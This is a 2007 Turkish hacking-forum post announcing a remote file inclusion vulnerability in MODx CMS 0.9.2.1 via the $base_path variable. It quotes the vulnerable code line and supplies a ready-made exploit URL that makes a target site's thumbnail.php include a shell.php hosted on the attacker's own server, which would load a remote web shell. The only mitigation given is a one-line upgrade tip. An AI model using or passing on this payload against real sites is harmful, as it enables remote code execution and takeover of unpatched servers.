PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 ModX CMS - RFi buyuk guvenlik acigi

Aşağa gitmek 
YazarMesaj
H@CKER
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 468
Şehir : www.hackturkiye.ile.biz
Meslek : H@CKER\'LİK
Kayıt tarihi : 12/08/07

MesajKonu: ModX CMS - RFi buyuk guvenlik acigi   Ptsi Ağus. 20, 2007 2:58 pm

Online içerik kontrol uygulaması olan MODx\'te tehlikeli sayılabilecek bir güvenlik açığı tespit edildi. $base_path değişkeninden kaynaklanan açık ile birlikte Remote File Include atakları yapmak mümkün.

Etkilenen Versiyon:MODx CMS 0.9.2.1
Risk:Yüksek

Kodumuz:
manager/media/browser/mcpuk/ connectors/php/commands/thumbnail.php, line(s) 24:

$base_path.\"manager/media/browser/mcpuk/ connectors/php/Commands/helpers/iconlookup.php\";



Kod:
Örnek:
Kodumuz:
http://[hedefsite]/manager/media/browser/mcpuk/ connectors/php/Commands/Thumbnail.php?base_path=http://sizinsiteniz.com/shell.php?


Boşlukları ihmal ediniz.

Çözüm:Son versiyona yükseltmek.
Web Adresi: www.modxcms.com
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
ModX CMS - RFi buyuk guvenlik acigi
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: